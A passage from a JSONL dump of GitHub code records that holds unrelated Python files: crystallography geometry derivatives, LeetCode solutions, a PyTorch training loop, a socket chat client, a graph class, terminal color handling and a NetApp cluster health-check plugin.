ImageD11.transform.compute_g_from_k(dummy,\n omega, wedge=wedge, chi=chi )\n dummy[1,:]=0\n dummy[2,:]=1\n dgdk2 = ImageD11.transform.compute_g_from_k(dummy,\n omega, wedge=wedge, chi=chi )\n return dgdk0,dgdk1,dgdk2\n\n\ndef g_from_k( kvecs, colfile, pars ):\n d0,d1,d2 = DgDk( colfile, pars ) \n g = kvecs[0,:]*d0 + kvecs[1,:]*d1 + kvecs[2,:]*d2\n return g\n\ndef derivative_g_from_k( kvecs, Dkvecs, colfile, pars, refinables ):\n omega = colfile.omega\n # this would applies a rotation matrix which depends on omega, wedge, chi\n wedge = pars.get('wedge')\n chi = pars.get('chi')\n dummy = np.zeros( (3, len(omega) ) )\n dummy[0,:]=1\n dgdk0 = ImageD11.transform.compute_g_from_k(dummy,\n omega, wedge=wedge, chi=chi )\n dummy[0,:]=0\n dummy[1,:]=1\n dgdk1 = ImageD11.transform.compute_g_from_k(dummy,\n omega, wedge=wedge, chi=chi )\n dummy[1,:]=0\n dummy[2,:]=1\n dgdk2 = ImageD11.transform.compute_g_from_k(dummy,\n omega, wedge=wedge, chi=chi )\n g = kvecs[0,:]*dgdk0 + kvecs[1,:]*dgdk1 + kvecs[2,:]*dgdk2\n Dg = {}\n if 'wedge' in refinables:\n dummy[2,:]=0\n dummy[0,:]=1\n sw= oripsteps['wedge'](wedge)\n mat00 = ImageD11.transform.compute_g_from_k(dummy,\n omega, wedge=wedge+sw, chi=chi )\n dummy[0,:]=0\n dummy[1,:]=1\n mat10 = ImageD11.transform.compute_g_from_k(dummy,\n omega, wedge=wedge+sw, chi=chi )\n dummy[1,:]=0\n dummy[2,:]=1\n mat20 = ImageD11.transform.compute_g_from_k(dummy,\n omega, wedge=wedge+sw, chi=chi )\n dmat0dw = (mat00 - dgdk0)/sw\n dmat1dw = (mat10 - dgdk1)/sw\n dmat2dw = (mat20 - dgdk2)/sw\n if 'chi' in refinables:\n dummy[2,:]=0\n dummy[0,:]=1\n sc = oripsteps['chi'](chi)\n mat01 = ImageD11.transform.compute_g_from_k(dummy,\n omega, wedge=wedge, chi=chi+sc )\n dummy[0,:]=0\n dummy[1,:]=1\n mat11 = ImageD11.transform.compute_g_from_k(dummy,\n omega, wedge=wedge, chi=chi+sc )\n dummy[1,:]=0\n dummy[2,:]=1\n mat21 = ImageD11.transform.compute_g_from_k(dummy,\n omega, wedge=wedge, chi=chi+sc )\n dmat0dc = (mat01 - dgdk0)/sc\n dmat1dc = (mat11 - dgdk1)/sc\n dmat2dc = (mat21 - dgdk2)/sc\n for p in refinables:\n dk = Dkvecs[p]\n # g = sum_i dgdki.ki\n # dgdp = sum_i dgdki/dp.ki + dgdki.dkidp\n # print p, k.shape\n Dg[p] = dk[0,:]*dgdk0 + dk[1,:]*dgdk1 + dk[2,:]*dgdk2\n if p == 'wedge':\n # add on dmat contribution\n Dg[p] += kvecs[0,:]*dmat0dw + kvecs[1,:]*dmat1dw + \\\n kvecs[2,:]*dmat2dw\n if p == 'chi':\n # add on dmat contribution\n Dg[p] += kvecs[0,:]*dmat0dc + kvecs[1,:]*dmat1dc + \\\n kvecs[2,:]*dmat2dc\n return g, Dg\n\n\ndef rotv3n( mat, Dmat, v3n, Dv3n ):\n \"\"\"\n Rotate vector by mat\n \"\"\"\n rv = np.dot( mat, v3n )\n# print rv.shape, mat.shape, v3n.shape\n# assert (rv[:,0] == np.dot(mat, v3n[:,0])).all()\n Drv = {}\n for p in Dv3n:\n Drv[p] = np.dot( mat, Dv3n[p] )\n for p in Dmat:\n assert not Drv.has_key(p)\n Drv[p] = np.dot( Dmat[p], v3n )\n return rv, Drv\n\ndef modv3n( vec3n ):\n v2 = vec3n*vec3n\n assert v2.shape[0] == 3\n modv = np.sqrt(v2.sum(axis=0)) \n return modv\n\n\ndef Derivativemodv3n( vec3n, Dvec3n ):\n v2 = vec3n*vec3n\n assert v2.shape[0] == 3\n modv = np.sqrt(v2.sum(axis=0)) \n # Now for derivatives.\n # We have vec3n and d(vec3n)/dp\n # We want modv and d(modv)/dp\n # d(modv) = sqrt( x*x+y*y+z*z )\n # d(modv)/dp = (dmodv/dx).(dx/dp) + (dmodv/dy).(dy/dp) + (dmodv/dz).(dz/dp)\n dmodvdx = vec3n / modv\n Dmodv3n={}\n for p in Dvec3n: # each parameter in turn\n Dmodv3n[p] = (dmodvdx*Dvec3n[p]).sum(axis=0)\n return modv, Dmodv3n\n\n\ndef quotient_v3n_v1n( vlabvec, vmodv3n ):\n quotient = vlabvec / vmodv3n \n return quotient\n\ndef Derivative_quotient_v3n_v1n( labvec, Dlabvec, vmodv3n, Dmodv3n):\n quotient = labvec / vmodv3n \n Dquotient = {}\n for p in Dlabvec.keys():\n Dquotient[p] = Dlabvec[p] / vmodv3n\n for p in Dmodv3n.keys():\n if Dquotient.has_key(p): \n Dquotient[p] -= Dmodv3n[p] * labvec / vmodv3n / vmodv3n\n else:\n Dquotient[p] = -Dmodv3n[p] * labvec / vmodv3n / vmodv3n\n return quotient, Dquotient\n\n\ndef Derivativegobs( cf, gr, pars, refinables):\n # Diffracted ray vector, depends on pars\n # labvec is an orthogonal basis (real laboratory coordinates)\n labvec, Dlabvec = derivativelabvec( cf, gr, pars,\n refinables )\n # Length of this vector\n valmodv3n, Dmodv3n = Derivativemodv3n( labvec, Dlabvec )\n # direction is along here: (eg, direction cosines, normalised vector)\n direction, Ddirection = Derivative_quotient_v3n_v1n( \n labvec, Dlabvec, valmodv3n, Dmodv3n)\n wavelength = pars.get('wavelength')\n k = direction / wavelength\n k[0,:] = k[0,:] - 1.0/wavelength # incident beam along x\n Dk = {}\n for p in Ddirection:\n Dk[p] = Ddirection[p]/wavelength\n # Now we would like to fit this in terms of the grain ubi matrix and hkl\n # indices\n # g = transform.compute_g_from_k( k , colfile.omega, pars.get(\"wedge\"), pars.get(\"chi\") )\n # Find hkl indices and which peaks are used\n #hklr = np.dot( grains[0].ubi, g )\n #hkli = np.floor(hklr+0.5)\n #drlv = (hklr - hkli)\n #drlv2 = np.sqrt((drlv*drlv).sum(axis=0))\n # Rotate k to g, still an orthogonal reciprocal angstrom based metric\n gobs, Dg = derivative_g_from_k( k , Dk, cf, pars, refinables )\n return gobs, Dg\n\ndef gobs( cf, gr, pars):\n # labvec is an orthogonal basis (real laboratory coordinates)\n v_labvec = labvec( cf, gr, pars )\n valmodv3n = modv3n( v_labvec )\n # direction is along here: (eg, direction cosines, normalised vector)\n direction = quotient_v3n_v1n( v_labvec , valmodv3n )\n wavelength = pars.get('wavelength')\n k = direction / wavelength\n k[0,:] = k[0,:] - 1.0/wavelength # incident beam along x\n gobs = g_from_k( k , cf, pars )\n return gobs\n\ndef derivativegcalc(gr, gobs):\n # find hkl indices of spots\n # FIXME : these ought to be fixed from the colfile\n # gradients are in Dg\n hkli = np.floor( np.dot( gr.ubi, gobs ) + 0.5 )\n ub = np.linalg.inv( gr.ubi )\n gr.ub = ub\n gcalc = np.dot( ub, hkli )\n # Derivatives of gcalc w.r.t UB\n Dgcalc = {}\n for i in range(3):\n for j in range(3):\n t = np.zeros((3,3))\n t[i,j] = 1\n name = 'ub%d%d'%(i,j)\n Dgcalc[name] = t\n gcalc, dGcalc = rotv3n( ub, Dgcalc, hkli, {} )\n return gcalc, dGcalc\n \n\n\nclass tmpcol:\n def __init__(self, cf):\n self.sc = cf.sc.copy()\n self.fc = cf.fc.copy()\n self.omega = cf.omega.copy()\n\ndef dGdobs( cf, gr, pars, step=0.01) :\n tmp = tmpcol( cf )\n\n g0 = gobs( tmp, gr, pars )\n np.add(tmp.sc, step, tmp.sc )\n g1 = gobs( tmp, gr, pars )\n dgdsc = ( g1 - g0 ) / step # 3,N\n np.subtract(tmp.sc,step,tmp.sc)\n\n np.add(tmp.fc, step, tmp.fc )\n g1 = gobs( tmp, gr, pars )\n dgdfc = ( g1 - g0 ) / step\n np.subtract(tmp.fc,step,tmp.fc) # 3,N\n\n np.add(tmp.omega, step, tmp.omega )\n g1 = gobs( tmp, gr, pars )\n dgdomega = ( g1 - g0 ) / step # 3,N\n \n return dgdsc, dgdfc, dgdomega\n\n\ndef rotate_errors( cf , gr, pars):\n\n # single data point, uncorrelated has a matrix of:\n # 1/ss 0 0\n # 0 1/ff 0\n # 0 0 1/oo\n #\n # correlated that would be:\n # 1/ss 1/sf 1/so\n # 1/fs 1/ff 1/fo\n # 1/os 1/of 1/oo\n weights = np.zeros( (3,3,cf.nrows ), np.float)\n weights[0,0] = 1./cf.sigs/cf.sigs\n weights[1,1] = 1./cf.sigf/cf.sigf\n weights[2,2] = 1./cf.sigo/cf.sigo\n weights[1,0] = weights[0,1]= cf.covsf/cf.sigs/cf.sigf\n weights[2,0] = weights[0,2]= cf.covso/cf.sigs/cf.sigo\n weights[2,1] = weights[1,2]= cf.covfo/cf.sigo/cf.sigf\n #\n #\n return weights\n\n\n\nimport wripaca\nfrom ImageD11 import gv_general\n\ndef omegacalc_ub( ubi, h, pars, romega):\n pre = np.eye(3).ravel()\n posti = np.dot(gv_general.wedgemat(pars.get('wedge')), \n gv_general.chimat(pars.get('chi'))).T.ravel()\n axis = np.array([0,0,-1],np.float)\n ub = np.linalg.inv(ubi)\n gcalc = np.dot( ub, h.T ).T.copy()\n romegacalc = np.zeros( romega.shape, np.float)\n romegaerr = np.zeros( romega.shape, np.float)\n wripaca.omegacalcclose(gcalc,\n pre,\n posti,\n axis,\n romega,\n romegacalc,\n romegaerr,\n pars.get('wavelength'),\n )\n return romegacalc\n\n\n\n\n\n\n\n","repo_name":"jonwright/wripaca","sub_path":"cython/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":12884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20428913177","text":"class Solution:\n def minCostClimbingStairs(self, cost: List[int]) -> int:\n\n n = len(cost)\n costVal = [i for i in range(n)]\n \n if n == 1:\n costVal[0] = cost[0]\n return cost[0]\n if n == 2:\n costVal[0] = cost[0]\n costVal[1] = cost[1]\n return min(costVal)\n if n == 3:\n costVal[0] = cost[0]\n costVal[1] = cost[1]\n costVal[2] = cost[2]\n return min(costVal[0] + costVal[2], costVal[1])\n else:\n costVal[0] = cost[0]\n costVal[1] = cost[1]\n for i in range(2,n):\n costVal[i] = min(costVal[i - 1],costVal[i -2]) + cost[i]\n return min(costVal[-1] , costVal[-2])\n \n \n","repo_name":"ekramkedir2020/interview-prep","sub_path":"0746-min-cost-climbing-stairs/0746-min-cost-climbing-stairs.py","file_name":"0746-min-cost-climbing-stairs.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21000801793","text":"import copy\nimport time\nfrom typing import Dict\n\nimport numpy as np\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom utils.metric import calculate_metrics\nfrom utils.util import save_model, to_var\n\n\ndef train_model(model: nn.Module, data_loaders: Dict[str, DataLoader],\n loss_func: callable, optimizer: optim,\n model_folder: str, tensorboard_folder: str,\n args, **kwargs):\n num_epochs = args.epochs\n phases = ['train', 'val', 'test']\n\n writer = SummaryWriter(tensorboard_folder)\n\n since = time.clock()\n\n # save_dict, best_rmse = {'model_state_dict': copy.deepcopy(model.state_dict()), 'epoch': 0}, 100000\n save_dict, best_pcc = {'model_state_dict': copy.deepcopy(model.state_dict()), 'epoch': 0}, 0\n\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=.2, patience=5, threshold=1e-3, min_lr=1e-6)\n\n try:\n for epoch in range(num_epochs):\n running_loss = {phase: 0.0 for phase in phases}\n for phase in phases:\n if phase == 'train':\n model.train()\n else:\n model.eval()\n\n steps, predictions, targets = 0, list(), list()\n tqdm_loader = tqdm(enumerate(data_loaders[phase]))\n for step, (features, truth_data) in tqdm_loader:\n features = to_var(features, args.device)\n truth_data = to_var(truth_data, args.device)\n with torch.set_grad_enabled(phase == 'train'):\n if args.lossinside:\n loss, outputs = model(features, truth_data, args, loss_func=loss_func)\n else:\n outputs = model(features, args)\n loss = loss_func(truth=truth_data, predict=outputs)\n # loss = loss_func(outputs, truth_data)\n\n if phase == 'train':\n if torch.isnan(loss):\n print(\"=============LOSS NAN============\")\n print(features)\n print(truth_data)\n print(outputs)\n else:\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n targets.append(truth_data.cpu().numpy())\n with torch.no_grad():\n predictions.append(outputs.cpu().detach().numpy())\n\n running_loss[phase] += loss * truth_data.size(0)\n steps += truth_data.size(0)\n\n tqdm_loader.set_description(\n f'{phase} epoch: {epoch}, {phase} loss: {running_loss[phase] / steps}')\n\n # For the issue that the CPU memory increases while training. DO NOT know why, but it works.\n torch.cuda.empty_cache()\n # 性能\n predictions = np.concatenate(predictions)\n targets = np.concatenate(targets)\n # print(2)\n # print(predictions[:3, :3])\n # print(targets[:3, :3])\n scores = calculate_metrics(predictions.reshape(predictions.shape[0], -1),\n targets.reshape(targets.shape[0], -1), args, plot=epoch % 5 == 0, **kwargs)\n # print(3)\n writer.add_scalars(f'score/{phase}', scores, global_step=epoch)\n with open(model_folder+\"/output.txt\", \"a\") as f:\n f.write(f'{phase} epoch: {epoch}, {phase} loss: {running_loss[phase] / steps}\\n')\n f.write(str(scores))\n f.write('\\n')\n f.write(str(time.time()))\n f.write(\"\\n\\n\")\n print(scores)\n # if phase == 'val' and scores['RMSE'] < best_rmse:\n if phase == 'val' and scores['pearr'] > best_pcc:\n best_pcc = scores['pearr']\n # best_rmse = scores['RMSE']\n save_dict.update(model_state_dict=copy.deepcopy(model.state_dict()),\n epoch=epoch,\n optimizer_state_dict=copy.deepcopy(optimizer.state_dict()))\n\n scheduler.step(running_loss['train'])\n\n writer.add_scalars('Loss', {\n f'{phase} loss': running_loss[phase] / len(data_loaders[phase].dataset) for phase in phases},\n global_step=epoch)\n finally:\n time_elapsed = time.clock() - since\n print(f\"cost {time_elapsed} seconds\")\n\n save_model(f\"{model_folder}/best_model.pkl\", **save_dict)\n save_model(f\"{model_folder}/final_model.pkl\",\n **{'model_state_dict': copy.deepcopy(model.state_dict()),\n 'epoch': num_epochs,\n 'optimizer_state_dict': copy.deepcopy(optimizer.state_dict())})\n","repo_name":"yanshaojie123/time_estimation","sub_path":"train/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"633843286","text":"from socket import AF_INET, socket, SOCK_STREAM\nfrom threading import Thread\n\n\ndef receive():\n \"\"\"Handles receiving of messages.\"\"\"\n while True:\n try:\n msg = client_socket.recv(BUFSIZ).decode(\"utf8\")\n msg_list.append(msg)\n if msg:\n print(chr(27) + \"[2J\")\n [print(mens) for mens in msg_list]\n send()\n except OSError: # Possibly client has left the chat.\n break\n\n\ndef send(event=None): # event is passed by binders.\n \"\"\"Handles sending of messages.\"\"\"\n msg = input(\"escribir mensaje: \")\n # my_msg = \"\" # Clears input field.\n client_socket.send(bytes(msg, \"utf8\"))\n if msg == \"{quit}\":\n client_socket.close()\n quit()\n\n\nmy_msg = \"mensaje\"\nmsg_list = []\n\n# ----Now comes the sockets part----\nHOST = input('Enter host: ')\nPORT = input('Enter port: ')\nif not PORT:\n PORT = 33000\nelse:\n PORT = int(PORT)\n\nBUFSIZ = 1024\nADDR = (HOST, PORT)\n\nclient_socket = socket(AF_INET, SOCK_STREAM)\nclient_socket.connect(ADDR)\n\nreceive_thread = Thread(target=receive)\nreceive_thread.start()\n","repo_name":"alete89/playground","sub_path":"chatConsoleClient.py","file_name":"chatConsoleClient.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74317239849","text":"from igraph import *\n\ndef add_edges_to_table(table, edges_list):\n for e in edges_list:\n if len(table) <= e[0] or len(table) <= e[1]:\n raise Exception('wrong list indexing')\n if table[e[0]][e[1]] is not None:\n table[e[0]][e[1]].append(e[2])\n else:\n table[e[0]][e[1]] = [e[2]]\n\n\ndef edges_list_to_table(edges_list, size):\n table = []\n for i in range(size):\n table.append([])\n for j in range(size):\n table[-1].append(None)\n add_edges_to_table(table, edges_list)\n return table\n\n\ndef table_to_edges_list(table):\n edges = []\n for i in range(len(table)):\n for j in range(len(table)):\n if table[i][j] is not None:\n for e in table[i][j]:\n edges.append((i, j, e))\n return edges\n\n\ndef best_visual_style(g, edges_sz, stash_sz, vertexes_sz):\n visual_style = {}\n visual_style[\"vertex_size\"] = 20\n visual_style[\"vertex_color\"] = ['pink' for gender in range(vertexes_sz)]\n visual_style[\"vertex_label\"] = g.vs[\"name\"]\n visual_style[\"vertex_name\"] = g.vs[\"name\"]\n visual_style[\"edge_width\"] = [0.1 * w for w in g.es['weight']]\n visual_style[\"layout\"] = g.layout('large')\n visual_style[\"bbox\"] = (1200, 1200)\n # shortest_length =\n visual_style['arrow_size'] = [0.5 for w in g.es['weight']]\n visual_style['edge_color'] = ['black' if i in range(edges_sz) else 'red' for i in range(edges_sz + stash_sz)]\n return visual_style\n\n\nclass LabGraph:\n nodes = []\n edges = None # edges[i][j] is an array of distances from node i to node j\n edges_list = None # for each edge in graph there is a tuple: (i, j, dist)\n edges_stash = None\n edges_stash_list = None\n\n def get_weighted_shortest_list(self):\n return [[min(e) if e is not None else None for e in arr] for arr in self.edges]\n\n def get_not_weighted_list(self):\n return [[1 if e is not None else None for e in arr] for arr in self.edges]\n\n def cnt_nodes(self):\n return len(self.nodes)\n\n def cnt_edges(self):\n cnt = 0\n for arr in self.edges:\n cnt += sum([len(e) if e is not None else 0 for e in arr])\n return cnt\n\n def max_neighbours_nodes(self):\n neighbours = {}\n for i in range(len(self.nodes)):\n neighbours[self.nodes[i]] = [self.nodes[j] for j in range(len(self.nodes)) if\n self.nodes[i][j] is not None and self.nodes[i][j]]\n return neighbours\n\n def add_to_stash(self, e_stash=None, e_stash_list=None, size=None):\n if e_stash is not None:\n if self.edges_stash is None:\n self.edges_stash = e_stash\n self.edges_stash_list = table_to_edges_list(e_stash)\n else:\n e_stash_list = table_to_edges_list(e_stash)\n add_edges_to_table(self.edges_stash, e_stash_list)\n self.edges_stash_list.extend(e_stash_list)\n else:\n if self.edges_stash is None:\n if size is None:\n size = len(self.edges)\n self.edges_stash = edges_list_to_table(e_stash_list, size)\n self.edges_stash_list = e_stash_list\n else:\n add_edges_to_table(self.edges_stash, e_stash_list)\n self.edges_stash_list.extend(e_stash_list)\n\n def apply_stash(self):\n add_edges_to_table(self.edges, self.edges_stash_list)\n self.edges_list.extend(self.edges_stash_list)\n self.edges_stash = None\n self.edges_stash_list = None\n\n def save_plot(self, folder, filename):\n g = Graph().as_directed()\n g.add_vertices(len(self.nodes))\n weights = []\n for i in range(len(self.edges)):\n for j in range(len(self.edges[i])):\n if self.edges[i][j] is not None:\n for e in self.edges[i][j]:\n g.add_edges([(i, j)])\n weights.append(e)\n if self.edges_stash is not None:\n for i in range(len(self.edges_stash)):\n for j in range(len(self.edges_stash[i])):\n if self.edges_stash[i][j] is not None:\n for e in self.edges_stash[i][j]:\n g.add_edges([(i, j)])\n weights.append(e)\n g.es['weight'] = weights\n g.vs['name'] = [str(e) for e in range(len(self.nodes))]\n # g.es['name'] = [str(e) for e in weights]\n # g.es['label'] = [str(e) for e in weights]\n visial_style = best_visual_style(g, len(self.edges), 0 if self.edges_stash is None else len(self.edges_stash), len(self.nodes))\n plot(g, folder+filename+'.png', **visial_style)\n\n def __init__(self, nodes, edges=None, edges_list=None, size=None):\n self.nodes = nodes\n if edges is not None:\n self.edges = []\n for e in edges:\n self.edges.append(e.copy())\n self.edges_list = table_to_edges_list(edges)\n else:\n self.edges = edges_list_to_table(edges_list, size)\n self.edges_list = edges_list.copy()\n\n","repo_name":"FixerLT/labs","sub_path":"discrete math/helpers/my_graph.py","file_name":"my_graph.py","file_ext":"py","file_size_in_byte":5173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25140313675","text":"with open('file_6.txt', encoding='utf-8') as file:\n result = {}\n for line in file: # залезаем в строчку файла\n s = [] # создаем список для каждой строки, который будем заполнять числами из строки\n for elements in line.split(): # залезаем в каждое слово строки\n i = [int(j) for j in elements if j.isdigit()] # создадим список и поместим туда цифры\n if i:\n i = int(''.join((str(_) for _ in i))) # теперь склеим цифры в единое число\n s.append(i) # и добавим в список чисел из строки\n result[line.split()[0]] = sum(s) # добавим в результат ключ из первого элемента строки\n # и поместим в его значение сумму чисел из строки\n print(result)\n\n","repo_name":"Sashagrande/Faculty-of-AI","sub_path":"Lesson_5/task_6.py","file_name":"task_6.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30531958581","text":"from topydo.lib.Config import config\n\nNEUTRAL_COLOR = '\\033[0m'\n\nclass Colors(object):\n def __init__(self):\n self.priority_colors = config().priority_colors()\n self.project_color = config().project_color()\n self.context_color = config().context_color()\n self.metadata_color = config().metadata_color()\n self.link_color = config().link_color()\n\n def _int_to_ansi(self, p_int, p_decorator='normal', p_safe=True):\n \"\"\"\n Returns ansi code for color based on xterm color id (0-255) and\n decoration, where decoration can be one of: normal, bold, faint,\n italic, or underline. When p_safe is True, resulting ansi code is\n constructed in most compatible way, but with support for only base 16\n colors.\n \"\"\"\n decoration_dict = {\n 'normal': '0',\n 'bold': '1',\n 'faint': '2',\n 'italic': '3',\n 'underline': '4'\n }\n\n decoration = decoration_dict[p_decorator]\n\n try:\n if p_safe:\n if 8 > int(p_int) >=0:\n return '\\033[{};3{}m'.format(decoration, str(p_int))\n elif 16 > int(p_int):\n p_int = int(p_int) - 8\n return '\\033[{};1;3{}m'.format(decoration, str(p_int))\n\n if 256 > int(p_int) >=0:\n return '\\033[{};38;5;{}m'.format(decoration, str(p_int))\n else:\n return NEUTRAL_COLOR\n except ValueError:\n return None\n\n def _name_to_int(self, p_color_name):\n \"\"\" Returns xterm color id from color name. \"\"\"\n color_names_dict = {\n 'black': 0,\n 'red': 1,\n 'green': 2,\n 'yellow': 3,\n 'blue': 4,\n 'magenta': 5,\n 'cyan': 6,\n 'gray': 7,\n 'darkgray': 8,\n 'light-red': 9,\n 'light-green': 10,\n 'light-yellow': 11,\n 'light-blue': 12,\n 'light-magenta': 13,\n 'light-cyan': 14,\n 'white': 15,\n }\n\n try:\n return color_names_dict[p_color_name]\n except KeyError:\n return 404\n\n def _name_to_ansi(self, p_color_name, p_decorator):\n \"\"\" Returns ansi color code from color name. \"\"\"\n number = self._name_to_int(p_color_name)\n\n return self._int_to_ansi(number, p_decorator)\n\n def _get_ansi(self, p_color, p_decorator):\n \"\"\" Returns ansi color code from color name or xterm color id. \"\"\"\n if p_color == '':\n ansi = ''\n else:\n ansi = self._int_to_ansi(p_color, p_decorator, False)\n\n if not ansi:\n ansi = self._name_to_ansi(p_color, p_decorator)\n\n return ansi\n\n def get_priority_colors(self):\n pri_ansi_colors = dict()\n\n for pri in self.priority_colors:\n color = self._get_ansi(self.priority_colors[pri], 'normal')\n\n if color == '':\n color = NEUTRAL_COLOR\n\n pri_ansi_colors[pri] = color\n\n return pri_ansi_colors\n\n def get_project_color(self):\n return self._get_ansi(self.project_color, 'bold')\n\n def get_context_color(self):\n return self._get_ansi(self.context_color, 'bold')\n\n def get_metadata_color(self):\n return self._get_ansi(self.metadata_color, 'bold')\n\n def get_link_color(self):\n return self._get_ansi(self.link_color, 'underline')\n","repo_name":"LeonCLi/topydo","sub_path":"topydo/lib/Colors.py","file_name":"Colors.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"72070859047","text":"# 给定一个 n 叉树的根节点 root ,返回 其节点值的 前序遍历 。 \n# \n# n 叉树 在输入中按层序遍历进行序列化表示,每组子节点由空值 null 分隔(请参见示例)。 \n# \n# \n# 示例 1: \n# \n# \n# \n# \n# 输入:root = [1,null,3,2,4,null,5,6]\n# 输出:[1,3,5,6,2,4]\n# \n# \n# 示例 2: \n# \n# \n# \n# \n# 输入:root = [1,null,2,3,4,5,null,null,6,7,null,8,null,9,10,null,null,11,null,12,\n# null,13,null,null,14]\n# 输出:[1,2,3,6,7,11,14,4,8,12,5,9,13,10]\n# \n# \n# \n# \n# 提示: \n# \n# \n# 节点总数在范围 [0, 10⁴]内 \n# 0 <= Node.val <= 10⁴ \n# n 叉树的高度小于或等于 1000 \n# \n# \n# \n# \n# 进阶:递归法很简单,你可以使用迭代法完成此题吗? \n# 👍 229 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\n\nclass Solution:\n # def preorder(self, root: 'Node') -> List[int]:\n # \"\"\"\n # 方法1:递归法\n # :param root:\n # :return:\n # \"\"\"\n # res = []\n #\n # def pre(root):\n # if not root:\n # return\n # res.append(root.val)\n # for child in root.children:\n # pre(child)\n #\n # pre(root)\n # return res\n\n def preorder(self, root: 'Node') -> List[int]:\n \"\"\"\n 方法2:迭代法,栈\n :param root:\n :return:\n \"\"\"\n res = []\n if not root:\n return res\n stack = [root]\n while stack:\n node = stack.pop()\n res.append(node.val)\n # for child in node.children[::-1]:\n # stack.append(child)\n # stack.extend(node.children[::-1])\n stack.extend(reversed(node.children))\n return res\n\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[589]N 叉树的前序遍历.py","file_name":"[589]N 叉树的前序遍历.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30799887960","text":"import numpy as np\nimport argparse\nimport cv2\n\ndefault_str = 'output/bayesian_predictions/trial_{}.png'\nn = 10\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-p\", \"--plot\", type=str, required=True, help=\"path to save output image\")\n args = parser.parse_args()\n\n images = []\n for i in range(n):\n images.append(cv2.imread(default_str.format(i+1)))\n\n row1 = np.concatenate(images[:n//2], axis=1)\n row2 = np.concatenate(images[n//2:], axis=1)\n stitched_image = np.concatenate([row1, row2], axis=0)\n\n cv2.imwrite(args.plot, stitched_image)\n","repo_name":"rabisnath/deeptrouble","sub_path":"LeNet_example/stitch.py","file_name":"stitch.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14333674454","text":"import logging\nfrom monplugin import Check,Status\nfrom netapp_ontap.resources import Cluster, Node, IpInterface\nfrom netapp_ontap.error import NetAppRestError\nfrom ..tools import cli\nfrom ..tools.helper import setup_connection,severity,item_filter\n\n__cmd__ = \"cluster-health\"\n\n\"\"\"\n\"\"\"\ndef run():\n parser = cli.Parser()\n parser.add_optional_arguments(cli.Argument.EXCLUDE,cli.Argument.INCLUDE)\n parser.add_optional_arguments({\n 'name_or_flags': ['--mode'],\n 'options': {\n 'action': 'store',\n 'choices': ['health', 'connect'],\n 'default': 'health',\n 'help': 'check health state or interconnect of a cluster',\n }\n })\n args = parser.get_args()\n # Setup module logging\n logger = logging.getLogger(__name__)\n logger.disabled=True\n if args.verbose:\n for log_name, log_obj in logging.Logger.manager.loggerDict.items():\n log_obj.disabled = False\n logging.getLogger(log_name).setLevel(severity(args.verbose))\n\n setup_connection(args.host, args.api_user, args.api_pass)\n\n check = Check()\n\n # Get data\n try:\n cluster = Cluster()\n cluster.get(fields=\"name,metric,version\")\n logger.debug(f\"Cluster info \\n{cluster.__dict__}\")\n nodes_count = Node.count_collection()\n logger.debug(f\"found {nodes_count} nodes\")\n nodes = list(Node.get_collection(fields=\"name,state,membership,ha,cluster_interfaces\"))\n logger.debug(f\"{nodes}\")\n if args.mode == \"connect\":\n interfaces = []\n for node in nodes:\n # fetch cluster interfaces\n for ipint in node.cluster_interfaces:\n Interface = IpInterface(uuid=ipint.uuid)\n Interface.get()\n interfaces.append(Interface)\n except NetAppRestError as error:\n check.exit(Status.UNKNOWN, \"Error => {}\".format(error))\n #\n # Cluster health check\n #\n if args.mode == \"health\":\n # Cluster global health\n if 'ok' not in cluster.metric.status.lower():\n check.add_message(Status.CRITICAL,\"Cluster global status is {}\".format(cluster.metric.status))\n # Cluster node states\n for node in nodes:\n logger.debug(f\"Node info \\n{node.__dict__}\")\n m = \"{} state {} as {}; giveback: {}; takeover: {}\".format(node.name,node.state,node.membership,node.ha.giveback.state,node.ha.takeover.state)\n if 'up' in node.state:\n check.add_message(Status.OK, m)\n elif 'down' in node.state:\n check.add_message(Status.CRITICAL, m)\n else:\n check.add_message(Status.WARNING, m)\n short = f\"Checked {len(nodes)} Nodes\"\n\n #\n # Cluster connect check\n #\n count = 0\n if args.mode == \"connect\":\n for IpInt in interfaces:\n logger.debug(f\"Interface info {IpInt.name}\\n{IpInt.__dict__}\")\n if (args.exclude or args.include) and item_filter(args,IpInt.name):\n logger.debug(f\"ex-/include interface {IpInt.name}\")\n continue\n count += 1\n if 'down' in IpInt.state:\n check.add_message(Status.CRITICAL, f\"Int {IpInt.name} is {IpInt.state}\")\n elif not IpInt.location.is_home:\n check.add_message(Status.CRITICAL, f\"Int {IpInt.name} is on {IpInt.location.node.name} but should be on {IpInt.location.home_node.name}\")\n else:\n check.add_message(Status.OK, f\"Int {IpInt.name} on 